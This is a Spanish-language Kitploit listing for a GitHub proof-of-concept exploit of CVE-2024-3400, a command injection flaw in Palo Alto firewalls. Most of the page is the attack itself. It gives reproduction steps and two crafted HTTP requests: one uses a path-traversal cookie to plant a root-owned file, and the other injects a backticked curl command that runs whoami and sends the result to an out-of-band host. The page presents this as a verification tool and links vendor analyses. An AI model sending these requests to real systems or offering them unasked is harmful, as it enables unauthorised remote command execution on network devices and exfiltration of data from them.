Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3400-poc — Prueba de concepto del exploit para CVE-2024-3400, una vulnerabilidad de inyección de comandos en firewalls de Palo Alto, que demuestra la creación de archivos y la ejecución remota de comandos mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/ghassansabir/cve-2024-3400-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

Prueba de concepto del exploit para CVE-2024-3400, una vulnerabilidad de inyección de comandos en firewalls de Palo Alto, que demuestra la creación de archivos y la ejecución remota de comandos mediante solicitudes HTTP manipuladas.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de la vulnerabilidad CVE-2024-3400 (herramienta de verificación)

Descripción de la vulnerabilidad

CVE-2024-3400 es una vulnerabilidad de inyección de comandos presente en los sistemas de firewall de Palo Alto. Un atacante, mediante una solicitud HTTP cuidadosamente elaborada, puede ejecutar comandos maliciosos en el servidor objetivo e incluso obtener privilegios de root.

Pasos para reproducir la vulnerabilidad

  1. Envíe la siguiente solicitud HTTP:
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Después de enviar esta solicitud, se creará un archivo llamado hellome1337.txt en el servidor, y dicho archivo tendrá privilegios de root.

  1. Cuando intente acceder a este archivo, debería recibir un código de estado HTTP 403 (prohibido), en lugar de 404 (no encontrado).

Las capturas de pantalla muestran el efecto durante el proceso de explotación de esta vulnerabilidad:

image

image

Ejemplo de inyección de comandos

Para explotar esta vulnerabilidad y ejecutar una inyección de comandos, puede enviar la siguiente solicitud HTTP:

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Esta solicitud ejecutará el comando whoami en el servidor y enviará el resultado al servidor remoto especificado (por ejemplo: xxxxxxxxxxxxxxxxx.oast.fun).

Lectura adicional

  • Análisis de Rapid7
  • Análisis de WatchTowr Labs
Descargar herramienta